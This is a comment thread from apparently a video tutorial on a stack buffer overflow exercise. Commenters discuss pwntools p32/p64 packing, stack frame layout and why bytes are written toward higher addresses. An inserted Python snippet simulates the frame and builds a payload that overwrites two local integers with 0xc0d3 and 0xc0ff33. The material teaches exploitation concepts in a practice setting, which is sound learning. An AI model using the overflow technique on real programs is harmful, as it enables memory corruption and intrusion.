I love your way of explaining things, I've been checking several sources for this stuff and so far this is the best for my way of thinking. GG
Thank you Javier. I'm glad my videos could help you :)
Thank you
Awesome, congrats for 100 subscribers ✨
Thank you Jo :)
Thank you so much for the awesome explanation. Very simple and clear to understand. Keep it up!
Thank you :)
Wow, what an amazing explanation, bro.
Thank you :) Glad you liked it.
So the use of p32() is with regards to the data type (dword = 32bits)? And therefore p64() is with regard to qword? I had always thought that it was with regard to the architecture, 64bit vs 32bit....
I don't know if I understand what you mean. 32bit integers (and other data types) are used in 32bit architectures and 64 in 64bit ones. If you are packing a 32bit integer into its little endian format, you should use p32(). And p64() for 64bit ones.
I understand now. You explained it in a future video that I hadn't watched yet. Yes, p32() and p64() are strictly for how many bits we are using, regardless of the architecture. Thanks! @@RazviOverflow
Happy to help :) @@christiansanchez4883
Do we actually overflow the buffer ? What I understand is we only send payload that will rewrite until full size of buffer.
How do you know the size of the buffer? What's its size?
@@RazviOverflow From what I understand, the buffer size is 70, which we can get from rbp-0x70, and we send a payload of 70 bytes, right? So we don't actually overflow it?
@@Ziq0012 And what about vars _4h and _8h, living at rbp-0x4 and rbp-0x8 respectively? Do they live within the buffer?
@@RazviOverflow Yes, within the buffer; it is at the bottom of the buffer. rbp > vars_4h > var_8h > scanf input
@@Ziq0012 How can a variable live within a buffer if it has its own type and allocated memory? What if the code is something like int a; int b; char buff[104]; Do a and b live within buff?
Why must we put 0xc0d3 first? Why not 0xc0ff33 first instead?
Around 7:50 lies the explanation, it is because writing into memory happens from lower towards higher memory addresses, whereas the stack grows from higher towards lower addresses. Writing into memory happens in the fashion of: rbp-0x70, rbp-0x6F, rbp-0x6E, rbp-0x6D, and so on... so you are first overwriting rbp-0x8 and then rbp-0x4.
Please also show the decompiled code in your videos.
There's no need. Besides, which tool do you propose using?
What if I want to edit the values that are placed lower on memory, is there a way to underflow or something?
No, because writing into memory always happens from lower towards higher addresses.
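The two points argued in this thread (p32()/p64() pack a fixed number of bits, and bytes land in the frame from rbp-0x70 upward, so var_8h is reached before var_4h) can be checked with a small simulation. This is an added example, not code from the video or from any commenter; it assumes the layout named in the thread (char buff[104] at rbp-0x70, var_8h at rbp-0x8, var_4h at rbp-0x4) and that 0xc0d3 is meant for var_8h and 0xc0ff33 for var_4h, and it uses a constructed rbp value and its own p32/p64 built on struct.pack.

```python
import struct


def p32(value: int) -> bytes:
    """4-byte little-endian packing (what pwntools' p32() does on x86)."""
    return struct.pack("<I", value)


def p64(value: int) -> bytes:
    """8-byte little-endian packing (pwntools' p64())."""
    return struct.pack("<Q", value)


def u32(data: bytes) -> int:
    return struct.unpack("<I", data)[0]


RBP = 0x1000  # constructed base; only the distances from rbp matter
FRAME = {  # name: (address, size) as inferred from the thread
    "buff":   (RBP - 0x70, 104),  # char buff[104]: rbp-0x70 .. rbp-0x9
    "var_8h": (RBP - 0x8, 4),     # int at rbp-0x8
    "var_4h": (RBP - 0x4, 4),     # int at rbp-0x4
}
LOW = RBP - 0x70                   # lowest address in the simulated frame


def simulate_write(payload: bytes, start: int = LOW) -> dict:
    """Write payload one byte at a time starting at `start` and moving to
    higher addresses (as scanf/read do), then read back each variable."""
    mem = bytearray(0x80)          # rbp-0x70 .. rbp+0x10, zero-initialised
    if start - LOW + len(payload) > len(mem):
        raise ValueError("payload runs past the simulated frame")
    for i, byte in enumerate(payload):
        mem[start - LOW + i] = byte  # address increases with every byte
    result = {}
    for name, (addr, size) in FRAME.items():
        chunk = bytes(mem[addr - LOW:addr - LOW + size])
        result[name] = u32(chunk) if size == 4 else chunk
    return result


def build_payload(var_8h: int, var_4h: int) -> bytes:
    """Fill buff completely, then the two ints in increasing-address order."""
    return b"A" * 104 + p32(var_8h) + p32(var_4h)
```

Sending exactly 104 bytes leaves both ints untouched; swapping the two p32() calls puts 0xc0ff33 into var_8h, which is the mistake the question in this thread is about.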
Not me looking for the script to do so 😗
Don't cheat, learn the concepts :)